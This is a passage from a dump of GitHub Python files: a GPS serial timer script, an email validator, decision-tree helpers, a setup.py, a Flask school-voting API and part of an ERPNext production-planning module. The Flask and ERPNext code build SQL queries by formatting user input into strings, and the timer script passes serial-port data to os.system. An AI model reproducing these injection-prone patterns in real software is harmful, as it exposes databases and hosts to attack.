(isAmlValid+ '\\r\\n'+ '\\r\\n') # Print status (OK)to console \n\n\n#////////////////////////////////////// Serial Write loops /////////////////////////////////////////////\n\n\ndef writeCom1(textToWrite): # Serial port 1 ZDA Writer\n serZda.write(textToWrite.encode(encoding='utf_8', errors='strict')) # Encode data to serial protocol for Com1\n\n\ndef writeCom2(textToWrite): # Serial poort 2 AML Writer\n serAml.write(textToWrite.encode(encoding='utf_8', errors='strict')) # Encode data to serial protocol for Com2\n\n\n\n#///////////////////////////////// This is what happenes when pin 7 (PPS) goes high ///////////////////\n\n #When pulse() is used this is what happens\ndef pulse(channel):\n# global bTrigger; bTrigger = True # First the bTrigger is set to True to show a fresh pulse has been received \n print('trigger' ) # Give the terminal that PPS was received\n print (datetime.datetime.now()) # Print to console PPS was received\n global bZdaOntvangen\n global datumTijd\n global status\n print (bZdaOntvangen)\n\n\n\n if bZdaOntvangen == True:\n bZdaOntvangen = False\n os.system('date -s %s' % datumTijd) # Sets the system time to datumtijd (the time set per ZDA)\n datumtijd = False\n status = \"OK\"\n else:\n status = 'NZ'\n bZdaOntvangen = False\n\n# bZdaOntvangen = False\n \n #This is the detector that sees the pin goes high then starts the function pulse\nGPIO.add_event_detect(\"P9_42\", GPIO.RISING, callback=pulse, bouncetime = 300) # add rising edge detection on a channel the rest of your program...\n\n\n\n\n\n#////////////////////////////////////// Ethernet write loops //////////////////////////////////////////\n\n\nUDP_IP = \"192.168.1.22\"\n#UDP_IP = \"192.168.1.22\"\nUDP_PORT = 5001\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef UDPsender():\n while True:\n\n print('Send over Ethernet') # send to console that data is being sent over ethernet \n global dataToSend; print (dataToSend + '\\r\\n') # Print to console the message sent to Ethernet\n# sock.sendto(bytes(dataToSend, \"utf-8\"), (UDP_IP, UDP_PORT))\n sock.sendto(dataToSend, (UDP_IP, UDP_PORT))\n# global status; status = \"AZ\"\n clearAml()\n time.sleep(1) # Wait for a second (minus runtime of the code) and repeat\n\n\n#//////////////////////////////////// Serial loop ////////////////////////////////////////////////////\n\n\n#Start thread Ethernet UDP\nthrUDP = threading.Thread(name='UDPsender', target=UDPsender) # Create a thread for serial communication(thrAML) \nthrUDP.start() # Start said thread\n\n#Start thread serial 1 ZDA Reader\nthrZda = threading.Thread(name='serZdaReader', target=serZdaReader) # Create a thread for serial communication(thrZDA) \nthrZda.start() # Start said thread\n\n#Start thread serial 2 AML Reader\nthrAml = threading.Thread(name='serAmlReader', target=serAmlReader) # Create a thread for serial communication(thrAML) \nthrAml.start() # Start said thread\n\n\n\n\n # terminate thread\n","repo_name":"JSeabed/Bathy","sub_path":"Backup/Demoday Version/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":21516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28717832818","text":"# Problem: https://www.hackerrank.com/challenges/validate-list-of-email-address-with-filter/problem\n\nimport re\ndef fun(s):\n # return True if s is a valid email, else return False\n try:\n username = s.split('@')[0]\n website = s.split('@')[1].split('.')[0]\n extension = s.split('@')[1].split('.')[1]\n if (len(username) > 0) and (len(website) > 0) and (len(extension) > 0) and \\\n re.match(\"^[A-Za-z0-9_-]*$\", username) and \\\n re.match(\"^[A-Za-z0-9]*$\", website) and \\\n re.match(\"^[A-Za-z]*$\", extension) and (len(extension) <= 3):\n return True\n else: return False\n except:\n return False\n\ndef filter_mail(emails):\n return list(filter(fun, emails))\n\n\nn = int(input())\nemails = []\nfor _ in range(n):\n emails.append(input())\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)","repo_name":"clago7/HackerRank-Preparation","sub_path":"Python/12. Python Functionals/12.2 Validating Email Addresses With a Filter.py","file_name":"12.2 Validating Email Addresses With a Filter.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33512512940","text":"from common import *\n\n\ndef traverse_tree(file_name=None, node_index=0, classifier=None):\n eps = 0.1\n tree = classifier\n if node_index == 0:\n file = os.getcwd() + '\\\\' + file_name\n f = open(file, 'w')\n f.close()\n else:\n file = file_name\n left_node_index = 2 * node_index + 1\n right_node_index = 2 * node_index + 2\n\n if node_index != 0:\n level = int(np.floor(np.log2(node_index - eps)))\n if tree[node_index].classes is not None:\n contents = str('| ' * level + '|--- {}'.format(tree[node_index]))\n print(contents)\n f = open(file, 'a')\n f.write(contents + '\\n')\n f.close()\n if (left_node_index > len(tree)) or (right_node_index > len(tree)):\n return 0\n traverse_tree(node_index=left_node_index, file_name=file)\n traverse_tree(node_index=right_node_index, file_name=file)\n return 0\n\n\ndef push(STACK, node, top):\n\n STACK.append(node)\n top += 1\n\n return STACK, top\n\n\ndef pop(STACK, top):\n\n return STACK.pop(), top-1\n\n\ndef traverse_tree_make_graph( file_name=None, node_index=0, classifier=None, count=0):\n eps = 0.1\n\n # level = 0\n tree = classifier\n top = -1\n stack = list()\n stack, top = push(stack, tree[node_index], top)\n\n while True:\n\n if stack is []:\n break\n\n current_node, top = pop(stack, top)\n\n if current_node.classes is not None:\n print(current_node.classes)\n stack, top = push(stack, tree[2*tree.index(current_node)+2], top)\n stack, top = push(stack, tree[2*tree.index(current_node)+1], top)\n\n\ndef bootstrap(X,y, n_classifier=10, mode='sqrt'):\n\n bootstrapped_data = list()\n bootstrapped_X = list()\n bootstrapped_y = list()\n iters = n_classifier\n\n num_of_data = 0\n max_feature = int(np.ceil(np.sqrt(len(X.columns))))\n index = np.arange(0, len(X.columns))\n columns = list(X.columns)\n\n if mode is 'sqrt':\n num_of_data = int(np.ceil(np.sqrt(len(X))))\n\n elif mode is 'total':\n num_of_data = len(X)\n\n for iter in range(iters):\n select_col = list()\n select_feature = np.random.choice(index, max_feature, replace=False)\n for f in select_feature:\n select_col.append(columns[f])\n bootstrapped_index = list(set(np.random.randint(0, len(X), size=num_of_data)))\n temp = pd.merge(X[select_col].iloc[bootstrapped_index], y.iloc[bootstrapped_index], left_index=True, right_index=True)\n bootstrapped_data.append(temp)\n bootstrapped_X.append(X[select_col].iloc[bootstrapped_index])\n bootstrapped_y.append(y.iloc[bootstrapped_index])\n\n return bootstrapped_data, bootstrapped_X, bootstrapped_y\n","repo_name":"gomljo/DecisionTreeForPaper","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2353626853","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\n\nhere = path.abspath(path.dirname(__file__))\n\nlong_description = ''\nif path.isfile('README.md'):\n with open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nrequirements = []\nif path.isfile('requirements.txt'):\n with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:\n requirements = [line.strip() for line in f]\n\nsetup(\n name='python_dhl_germany',\n version='0.3.4.10',\n description='',\n long_description=long_description,\n long_description_content_type='text/markdown',\n keywords='',\n author='Johannes Eimer Production (JEP)',\n author_email='info@jep-dev.com',\n license='MIT',\n url='',\n packages=find_packages(exclude=['contrib', 'docs', 'tests', \"tests*\"]),\n data_files=[('', [\n 'dhl/wsdl/3.4.0/geschaeftskundenversand-api-3.4.0-schema-bcs_base.xsd',\n 'dhl/wsdl/3.4.0/geschaeftskundenversand-api-3.4.0-schema-cis_base.xsd',\n 'dhl/wsdl/3.4.0/production.wsdl',\n 'dhl/wsdl/3.4.0/test.wsdl',\n ])],\n include_package_data=True,\n install_requires=requirements,\n python_requires='>=3.9'\n)\n","repo_name":"FourZeroOne/python_dhl_germany","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73311882649","text":"from flask import Flask, jsonify, request\n\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\n#credenciales de mysql\n\napp.config['MYSQL_HOST']= 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'root'\napp.config['MYSQL_DB'] = 'colegio'\n\n#Creamos una variabel de tipo mysql y le mandamos la configuracion\n\nmysql = MySQL(app)\n\n@app.route('/colegio/traer/')\n\ndef traer(palabra):\n cur = mysql.connection.cursor()\n cur.execute(f\"select M.mat_nivel, E.est_cod, E.est_dni, E.est_nombres, E.est_ape_pat, E.est_ape_mat, E.est_fecha_nacimiento, E.est_sexo from matricula as M inner join estudiante as E on M.mat_id = E.id_mat where mat_nivel = '{palabra}' \")\n data = cur.fetchall()\n cur.close()\n print(data)\n \n return jsonify(data)\n\n\n\n@app.route('/colegio/turnos/')\n\ndef contar():\n cur = mysql.connection.cursor()\n cur.execute(f\"select count(mat_turno), mat_turno from matricula group by mat_turno\")\n data = cur.fetchall()\n cur.close()\n print(data)\n \n return jsonify(data)\n\n\n@app.route('/lista/agregar', methods=['POST'])\ndef agregar_lista():\n info = request.get_json()\n if(info['nombre']):\n # Crea conexioncon base de datos\n cur = mysql.connection.cursor()\n print('Ok')\n print(info['nombre'])\n query=\"INSERT INTO LISTA (lista_nombre) VALUES ('{}')\".format(info['nombre'])\n cur.execute(query)\n mysql.connection.commit()\n cur.close\n \n # conevertir string a json = jsnoify\n return jsonify({'message': 'Se agrego con exito', 'content': info})\n else:\n \n return jsonify({'message': 'Faltan valores'})\n \n\n@app.route('/colegio/traer_lista/')\n\ndef traer_lista():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT *from lista\")\n data = cur.fetchall()\n cur.close()\n print(data)\n \n return jsonify(data)\n\n\n@app.route('/lista/agregarvoto', methods=['POST'])\ndef agregar_voto():\n info = request.get_json()\n if(info['id'] and info['lista'] and info['fecha']):\n # Crea conexioncon base de datos\n cur = mysql.connection.cursor()\n print(info)\n query=\"INSERT INTO VOTO ( est_id,lista_id , lista_fecha) VALUES ({0},{1},'{2}')\".format(info['id'],info['lista'],info['fecha'])\n cur.execute(query)\n mysql.connection.commit()\n cur.close()\n \n # conevertir string a json = jsnoify\n return jsonify({'message': 'Se agrego con exito', 'content': info})\n else:\n \n return jsonify({'message': 'Faltan valores'})\n \n \n@app.route('/lista/mostrarvotos/')\n\ndef mostrar_votos():\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT *from voto\")\n data = cur.fetchall()\n cur.close()\n print(data)\n \n return jsonify(data)\n \n \napp.run(debug = True) \n","repo_name":"GuidoTorres/codigo8","sub_path":"Semana7/Dia1-backend/practicando-flask.py","file_name":"practicando-flask.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73342866647","text":"import frappe\nfrom frappe.model.document import Document\nfrom frappe import _, msgprint\nfrom frappe.utils import (\n\tadd_days,\n\tceil,\n\tcint,\n\tcomma_and,\n\tflt,\n\tget_link_to_form,\n\tgetdate,\n\tnow_datetime,\n\tnowdate,today,formatdate, get_first_day, get_last_day \n)\nfrom dateutil.relativedelta import relativedelta\nfrom frappe.utils import (\n\tcint,\n\tdate_diff,\n\tflt,\n\tget_datetime,\n\tget_link_to_form,\n\tgetdate,\n\tnowdate,\n\ttime_diff_in_hours,\n)\nfrom erpnext.manufacturing.doctype.manufacturing_settings.manufacturing_settings import (\n\tget_mins_between_operations,\n)\nfrom datetime import date,timedelta\nfrom erpnext.manufacturing.doctype.bom.bom import get_children, validate_bom_no\nimport datetime\nfrom erpnext.stock.doctype.item.item import get_item_defaults, get_last_purchase_details\nimport openpyxl\nfrom io import BytesIO\nfrom openpyxl import Workbook\nfrom frappe.utils import now\nfrom openpyxl.styles import Font\nfrom openpyxl.utils import get_column_letter\nfrom copy import deepcopy\n\nclass ProductionPlanningWithLeadTime(Document):\n\tdef onload(self):\n\t\tmr_doc = frappe.db.get_value(\"Material Request\", {\"production_planning_with_lead_time\":self.name}, \"name\")\n\t\tif mr_doc:\n\t\t\tupdate_mr_status_in_raw_materials_table(self, mr_doc)\n\t\n\tdef on_submit(self):\n\t\tfrappe.db.set_value(\"Production Planning With Lead Time\",self.name,\"status\",\"Submitted\")\n\t\tfrappe.db.commit()\n\t\tself.reload()\n\n\tdef on_cancel(self):\n\t\tfrappe.db.set_value(\"Production Planning With Lead Time\",self.name,\"status\",\"Cancelled\")\n\t\tfrappe.db.commit()\n\t\tself.reload()\n\t\n\t@frappe.whitelist()\n\tdef get_open_sales_orders(self):\n\t\t\"\"\" Pull sales orders which are pending to deliver based on criteria selected\"\"\"\n\t\tself.sales_order_table = ''\n\t\topen_so = get_sales_orders(self)\n\t\topen_mr = get_open_mr(self)\n\t\t\n\t\tif open_so or open_mr:\n\t\t\tself.add_so_in_table(open_so,open_mr)\n\t\telse:\n\t\t\tfrappe.msgprint(_(\"Sales orders And Material Request are not available for production\"))\n\t@frappe.whitelist()\n\tdef add_so_in_table(self, open_so,open_mr):\n\t\t\"\"\" Add sales orders in the table\"\"\"\n\t\tself.set('sales_order_table', [])\n\t\tif open_so != []:\n\t\t\tfor data in open_so:\n\t\t\t\tbom_data = frappe.db.sql(\"\"\"SELECT name,makeup_days from `tabBOM` where item = '{0}' and is_active = 1 and is_default =1 and docstatus = 1\"\"\".format(data.get(\"item_code\")),as_dict=1)\n\t\t\t\tdn_date = data.get('delivery_date')\n\t\t\t\ttoday_date = date.today()\n\t\t\t\t# Calculate Days to Deliver\n\t\t\t\tdays_to_deliver = (dn_date - today_date)\n\t\t\t\tself.append('sales_order_table', {\n\t\t\t\t\t'sales_order': data.get(\"name\"),\n\t\t\t\t\t'item':data.get('item_code'),\n\t\t\t\t\t'delivery_date':data.get('delivery_date'),\n\t\t\t\t\t'qty':data.get('qty'),\n\t\t\t\t\t'bom':bom_data[0].get('name'),\n\t\t\t\t\t'makeup_days':bom_data[0].get('makeup_days'),\n\t\t\t\t\t'days_to_deliver' : days_to_deliver.days,\n\t\t\t\t\t'sales_order_item':data.get('sales_order_item')\n\t\t\t\t})\n\t\tif open_mr != []:\n\t\t\tfor data in open_mr:\n\t\t\t\tbom_data = frappe.db.sql(\"\"\"SELECT name,makeup_days from `tabBOM` where item = '{0}' and is_active = 1 and is_default =1 and docstatus = 1\"\"\".format(data.get(\"item_code\")),as_dict=1)\n\t\t\t\tdn_date = data.get('delivery_date')\n\t\t\t\ttoday_date = date.today()\n\t\t\t\t# Calculate Days to Deliver\n\t\t\t\tdays_to_deliver = (dn_date - today_date)\n\t\t\t\tself.append('sales_order_table', {\n\t\t\t\t\t'material_request': data.get(\"name\"),\n\t\t\t\t\t'item':data.get('item_code'),\n\t\t\t\t\t'delivery_date':data.get('delivery_date'),\n\t\t\t\t\t'qty':data.get('qty'),\n\t\t\t\t\t'bom':bom_data[0].get('name'),\n\t\t\t\t\t'makeup_days':bom_data[0].get('makeup_days'),\n\t\t\t\t\t'days_to_deliver' : days_to_deliver.days,\n\t\t\t\t\t'material_request_item':data.get('material_request_item')\n\t\t\t\t})\n\t\t# self.save()\n\t\treturn self.sales_order_table\n\t@frappe.whitelist()\n\tdef sort_so_data(self):\n\t\t# sort so data based on delivery_date and priority\n\t\tself.sorted_sales_order_table = ''\n\t\tif self.sales_order_table:\n\t\t\tso_data = []\n\t\t\tfor row in self.sales_order_table:\n\t\t\t\tso_data.append({\n\t\t\t\t\t'sales_order':row.sales_order,\n\t\t\t\t\t'item':row.item,\n\t\t\t\t\t'qty':row.qty,\n\t\t\t\t\t'delivery_date':row.delivery_date,\n\t\t\t\t\t'priority':row.priority,\n\t\t\t\t\t'bom':row.bom,\n\t\t\t\t\t'days_to_deliver':row.days_to_deliver,\n\t\t\t\t\t'makeup_days':row.makeup_days,\n\t\t\t\t\t'sales_order_item':row.sales_order_item,\n\t\t\t\t\t'material_request':row.material_request,\n\t\t\t\t\t'material_request_item':row.material_request_item\n\t\t\t\t\t})\n\t\t\t# so_data = frappe.db.sql(\"\"\"SELECT * from `tabSales Order Table` where parent = '{0}'\"\"\".format(self.name),as_dict=1)\n\t\t\tsorted_so_data = sorted(so_data, key = lambda x: (x[\"delivery_date\"],x[\"priority\"]))\n\t\t\tcount = 1\n\t\t\tfor row in sorted_so_data:\n\t\t\t\trow.update({'idx':count})\n\t\t\t\tself.append('sorted_sales_order_table',row)\n\t\t\t\tcount = count + 1\n\t\treturn self.sorted_sales_order_table\n\t@frappe.whitelist()\n\tdef work_order_planning(self):\n\t\tself.fg_items_table = ''\n\t\t# fetch warehouse list from Rushabh settings\n\t\twarehouse_list = get_warehouses()\n\t\t# Get On hand stock\n\t\tohs = get_ohs(warehouse_list)\n\t\t# Get allocated available_stock\n\t\tallocated_ohs = get_allocated_ohs_fg()\n\t\t# Get Planned Stock\n\t\tplanned_data = self.get_planned_data_fg()\n\t\t# Get allocated Planned Stock\n\t\tallocated_planned_stock = get_allocated_planned_stock_fg()\n\t\t# Get actual available_stock\n\t\tohs = get_actual_ohs(ohs,allocated_ohs)\n\t\t# Get actual planned data for FG\n\t\tplanned_data = get_actual_planned_fg(planned_data,allocated_planned_stock)\n\t\tif self.sales_order_table:\n\t\t\tfg_data = []\n\t\t\tfor row in self.sales_order_table:\n\t\t\t\tfg_data.append({\n\t\t\t\t\t'sales_order':row.sales_order,\n\t\t\t\t\t'material_request':row.material_request,\n\t\t\t\t\t'item':row.item,\n\t\t\t\t\t'qty':row.qty,\n\t\t\t\t\t'delivery_date':row.delivery_date,\n\t\t\t\t\t'priority':row.priority,\n\t\t\t\t\t'bom':row.bom,\n\t\t\t\t\t'days_to_deliver':row.days_to_deliver,\n\t\t\t\t\t'makeup_days':row.makeup_days,\n\t\t\t\t\t'sales_order_item':row.sales_order_item,\n\t\t\t\t\t'material_request_item':row.material_request_item\n\t\t\t\t\t})\n\t\t# fg_data = frappe.db.sql(\"\"\"SELECT * from `tabSales Order Table` where parent = '{0}'\"\"\".format(self.name),as_dict=1)\n\t\tif fg_data:\n\t\t\tfg_data = sorted(fg_data, key = lambda x: (x[\"delivery_date\"],x[\"priority\"]))\n\t\t\tcount = 1\n\t\t\tfor row in fg_data:\n\t\t\t\tqty = flt(row.get(\"qty\")) - flt(ohs.get(row.get(\"item\"))) if flt(ohs.get(row.get(\"item\"))) < flt(row.get(\"qty\")) else 0\n\t\t\t\trow.update({'planned_qty':qty,'available_stock':ohs.get(row.get('item')),'already_planned_qty':planned_data.get(row.get('item')),'shortage':qty})\n\t\t\t\tremaining_qty = flt(ohs.get(row.get(\"item\"))) - flt(row.get(\"qty\")) if flt(ohs.get(row.get(\"item\"))) > flt(row.get(\"qty\")) else 0\n\t\t\t\tohs.update({row.get('item'):remaining_qty})\n\t\t\t\tplanned_allocate = flt(qty) - flt(planned_data.get(row.get(\"item\"))) if flt(planned_data.get(row.get(\"item\"))) < flt(qty) else 0\n\t\t\t\trow.update({'planned_qty':planned_allocate,'shortage':planned_allocate})\n\t\t\t\tremainingg_qty = flt(planned_data.get(row.get(\"item\"))) - flt(qty) if flt(planned_data.get(row.get(\"item\"))) > flt(qty) else 0\n\t\t\t\tplanned_data.update({row.get('item'):remainingg_qty})\n\t\t\t\toperation_time = frappe.db.sql(\"\"\"SELECT sum(time_in_mins) as operation_time from `tabBOM Operation` where parent = '{0}'\"\"\".format(row.get('bom')),as_dict=1)\n\t\t\t\ttotal_operation_time_in_mins = flt(operation_time[0].get('operation_time'))*row.get('planned_qty')\n\t\t\t\ttotal_operation_time_in_days = ceil(total_operation_time_in_mins/480)\n\t\t\t\t# Calculate date_to_be_ready\n\t\t\t\tdelivery_date = datetime.datetime.strptime(row.get('delivery_date'), '%Y-%m-%d')\n\t\t\t\tdelivery_date = delivery_date.date() \n\t\t\t\tdate_to_be_ready = (delivery_date-timedelta(total_operation_time_in_days)-timedelta(row.get('makeup_days')))\n\n\t\t\t\t#calculate partial stock and workstation availability\n\t\t\t\tpartial_qty_dict=get_partial_qty(date_to_be_ready, row.get(\"item\"), warehouse_list)\n\n\t\t\t\tpartial_workstation_availability=check_partial_workstation_availability(date_to_be_ready,row.get('bom'), row.get('planned_qty'))\n\t\t\t\tpartial_remark = \"{0}{1}\".format(partial_qty_dict.get(\"partial_remark\"), partial_workstation_availability.get(\"remark\") if partial_workstation_availability else \"\")\n\t\t\t\t\n\t\t\t\tdate_dict = check_workstation_availability(date_to_be_ready,row.get('bom'),row.get('planned_qty'))\n\t\t\t\trow.update({'idx':count,'total_operation_time':total_operation_time_in_days,'date_to_be_ready':date_to_be_ready, 'partial_remark':partial_remark})\n\n\t\t\t\tif date_dict:\n\t\t\t\t\trow.update({'planned_start_date':date_dict.get('planned_start_date'),'remark':date_dict.get('remark')})\n\t\t\t\telse:\n\t\t\t\t\trow.update({'planned_start_date':date_to_be_ready})\n\t\t\t\tself.append('fg_items_table',row)\n\t\t\t\tcount = count + 1\n\t\t\treturn self.fg_items_table\n\t@frappe.whitelist()\n\tdef sub_assembly_items(self):\n\t\tself.sub_assembly_items_table = ''\n\t\twarehouse_list = get_warehouses()\n\t\t# Get On hand stock\n\t\tohs = get_ohs(warehouse_list)\n\t\t# Get allocated available_stock\n\t\tallocated_ohs = get_allocated_ohs_sfg()\n\t\t# Get Planned Stock\n\t\tplanned_data = self.get_planned_data_fg()\n\t\t# Get actual available_stock\n\t\tohs = get_actual_ohs(ohs,allocated_ohs)\n\t\tif self.fg_items_table:\n\t\t\tfor row in self.fg_items_table:\n\t\t\t\tbom_data = []\n\t\t\t\tif row.get('planned_qty') > 0:\n\t\t\t\t\tdate_to_be_ready = datetime.datetime.strptime(row.get('planned_start_date'), '%Y-%m-%d')\n\t\t\t\t\tplanned_start_date = date_to_be_ready.date()\n\t\t\t\t\tget_sub_assembly_item(row.get(\"bom\"), bom_data, row.get(\"planned_qty\"),planned_start_date,row.name, warehouse_list)\n\t\t\t\t\tbom_data = sorted(bom_data, key = lambda x: x[\"bom_level\"],reverse=1)\n\t\t\t\t\tfor item in bom_data:\n\t\t\t\t\t\tfinal_row = dict()\n\t\t\t\t\t\tqty = flt(item.get(\"stock_qty\")) - flt(ohs.get(item.get(\"production_item\"))) if flt(ohs.get(item.get(\"production_item\"))) < flt(item.get(\"stock_qty\")) else 0\n\t\t\t\t\t\tfinal_row.update({'qty':qty,'available_stock':ohs.get(item.get('production_item')),'alreaady_planned_qty':planned_data.get(item.get('production_item')),'shortage':qty,'fg_item':item.get('parent_item_code'),'item':item.get('production_item'),'original_qty':item.get('stock_qty'),'bom':item.get('bom_no'),'sales_order':row.get('sales_order'),'material_request':row.get('material_request')})\n\t\t\t\t\t\tremaining_qty = flt(ohs.get(item.get(\"production_item\"))) - flt(item.get(\"stock_qty\")) if flt(ohs.get(item.get(\"production_item\"))) > flt(item.get(\"stock_qty\")) else 0\n\t\t\t\t\t\tohs.update({item.get('production_item'):remaining_qty})\n\t\t\t\t\t\tplanned_allocate = flt(qty) - flt(planned_data.get(item.get(\"production_item\"))) if flt(planned_data.get(item.get(\"production_item\"))) < flt(qty) else 0\n\t\t\t\t\t\tfinal_row.update({'qty':planned_allocate,'shortage':planned_allocate})\n\t\t\t\t\t\tremainingg_qty = flt(planned_data.get(item.get(\"production_item\"))) - flt(qty) if flt(planned_data.get(item.get(\"production_item\"))) > flt(qty) else 0\n\t\t\t\t\t\tplanned_data.update({item.get('production_item'):remainingg_qty})\n\t\t\t\t\t\t# operation_time = frappe.db.sql(\"\"\"SELECT sum(time_in_mins) as operation_time from `tabBOM Operation` where parent = '{0}'\"\"\".format(item.get('bom_no')),as_dict=1)\n\t\t\t\t\t\t# total_operation_time_in_mins = flt(operation_time[0].get('operation_time'))*final_row.get('qty')\n\t\t\t\t\t\t# total_operation_time_in_days = ceil(total_operation_time_in_mins/480)\n\t\t\t\t\t\t# makeup_days = frappe.db.get_value(\"BOM\",{'name':item.get('bom_no')},'makeup_days')\n\t\t\t\t\t\t# date_to_be_ready = datetime.datetime.strptime(row.get('date_to_be_ready'), '%Y-%m-%d')\n\t\t\t\t\t\t# date_to_be_ready = date_to_be_ready.date()\n\t\t\t\t\t\t# date_to_be_ready = (date_to_be_ready-timedelta(total_operation_time_in_days)-timedelta(makeup_days))\n\t\t\t\t\t\tfinal_row.update({'total_operation_time':item.get('total_operation_time'),'date_to_be_ready':item.get('date_to_be_ready'),'planned_start_date':item.get('planned_start_date'),'fg_row_name':item.get('row_name'),'remark':item.get('remark'), 'partial_remark':item.get('partial_remark'),'parent_item_code':row.get('item')})\n\t\t\t\t\t\tself.append('sub_assembly_items_table',final_row)\n\t\t\treturn self.sub_assembly_items_table\n\t\t\t\t\t\t\n\t@frappe.whitelist()\n\tdef get_raw_materials(self):\n\t\tself.raw_materials_table = ''\n\t\twarehouse_list = get_warehouses()\n\t\t# Get On hand stock\n\t\tohs = get_ohs(warehouse_list)\n\t\t# Get allocated available_stock\n\t\tallocated_ohs = get_allocated_ohs_raw()\n\t\t# Get actual available_stock\n\t\tohs = get_actual_ohs(ohs,allocated_ohs)\n\t\tif self.sub_assembly_items_table:\n\t\t\tfor row in self.sub_assembly_items_table:\n\t\t\t\traw_data = []\n\t\t\t\tget_raw_items(row.bom,raw_data,row.qty)\n\t\t\t\tremaining_dict = dict()\n\t\t\t\tfor item in raw_data:\n\t\t\t\t\tlead_time = frappe.db.get_value(\"Item\",{'name':item.get('item')},'lead_time_days')\n\t\t\t\t\titem.update({'available_stock':ohs.get(item.get('item')),'lead_time':lead_time,'original_qty':item.get('qty')})\n\t\t\t\t\trm_readiness_days = frappe.db.get_single_value(\"Rushabh Settings\",'rm_readiness_days')\n\t\t\t\t\tdate_to_be_ready = datetime.datetime.strptime(row.get('planned_start_date'), '%Y-%m-%d')\n\t\t\t\t\tdate_to_be_ready = date_to_be_ready.date()\n\t\t\t\t\trequired_date = (date_to_be_ready-timedelta(rm_readiness_days))\n\t\t\t\t\titem.update({'date_to_be_ready':required_date})\n\t\t\t\t\ttoday_date = date.today()\n\t\t\t\t\t# Calculate Order in days\n\t\t\t\t\torder_in_days = (required_date - today_date)\n\t\t\t\t\titem.update({'order_in_days':order_in_days.days})\n\t\t\t\t\t# Allocate from available_stock\n\t\t\t\t\tqty = flt(item.get(\"qty\")) - flt(ohs.get(item.get(\"item\"))) if flt(ohs.get(item.get(\"item\"))) < flt(item.get(\"qty\")) else 0\n\t\t\t\t\tremainingg_qty = flt(ohs.get(item.get(\"item\"))) - flt(item.get(\"qty\")) if flt(ohs.get(item.get(\"item\"))) > flt(item.get(\"qty\")) else 0\n\t\t\t\t\tohs.update({item.get('item'):remainingg_qty})\n\t\t\t\t\titem.update({'shortage':qty,'qty':qty})\n\t\t\t\t\tif item.get('qty') == 0:\n\t\t\t\t\t\titem.update({'readiness_status':'#008000'})\n\t\t\t\t\t\titem.update({'latest_date_availability':today_date})\n\t\t\t\t\t\tself.append('raw_materials_table',item)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\t# Allocate from planned_po nd mr of type Purchase\n\t\t\t\t\t\tif item.get('item') not in remaining_dict:\n\t\t\t\t\t\t\ton_order_stock,schedule_date_dict = get_on_order_stock(self,required_date)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif item.get('item') in on_order_stock:\n\t\t\t\t\t\t\t\tqty = flt(item.get(\"qty\")) - flt(on_order_stock.get(item.get(\"item\"))) if flt(on_order_stock.get(item.get(\"item\"))) < flt(item.get(\"qty\")) else 0\n\t\t\t\t\t\t\t\t# print(\"=============item\",item.get('item'),qty)\n\n\t\t\t\t\t\t\t\t# if flt(item.get(\"qty\")) == 0:\n\t\t\t\t\t\t\t\t# \titem.update({'latest_date_availability':today_date})\n\t\t\t\t\t\t\t\t# elif qty == 0:\n\t\t\t\t\t\t\t\t# \titem.update({'latest_date_availability':schedule_date_dict.get(item.get('item'))})\n\t\t\t\t\t\t\t\t# else:\n\t\t\t\t\t\t\t\t# \tlatest_date_availability = today_date + timedelta(lead_time)\n\t\t\t\t\t\t\t\t# \titem.update({'latest_date_availability':latest_date_availability})\n\t\t\t\t\t\t\t\tremaining_qty = flt(on_order_stock.get(item.get('item'))) - item.get('qty') \n\t\t\t\t\t\t\t\tremaining_dict[item.get('item')] = remaining_qty if remaining_qty > 0 else 0\n\t\t\t\t\t\t\t\titem.update({'qty':qty,'on_order_stock':on_order_stock.get(item.get(\"item\")),'shortage':qty})\n\t\t\t\t\t\t\t\titem.update({'latest_date_availability':schedule_date_dict.get(item.get('item'))})\n\t\t\t\t\t\t\t\titem.update({'readiness_status':'#FFA500'})\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlatest_date_availability = today_date + timedelta(lead_time)\n\t\t\t\t\t\t\t\titem.update({'latest_date_availability':latest_date_availability,'readiness_status':'#FF0000'})\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tvirtual_stock = remaining_dict.get(item.get('item'))\n\t\t\t\t\t\t\tqty = flt(item.get(\"qty\")) - flt(virtual_stock) if flt(virtual_stock) < flt(item.get(\"qty\")) else 0\n\t\t\t\t\t\t\tremaining_qty = virtual_stock - item.get('qty')\n\n\t\t\t\t\t\t\tremaining_dict[item.get('item')] = remaining_qty if remaining_qty > 0 else 0\n\t\t\t\t\t\t\titem.update({'qty':qty,'on_order_stock':virtual_stock,'shortage':qty})\n\t\t\t\t\t\t\titem.update({'latest_date_availability':schedule_date_dict.get(item.get('item'))})\n\t\t\t\t\t\t\titem.update({'readiness_status':'#FFA500'})\n\t\t\t\t\t\t# if item.get('latest_date_availability'):\n\t\t\t\t\t\t# \tlatest_date_availability_in_days = (item.get('latest_date_availability') - today_date).days\n\t\t\t\t\t\t# \treadiness_status = 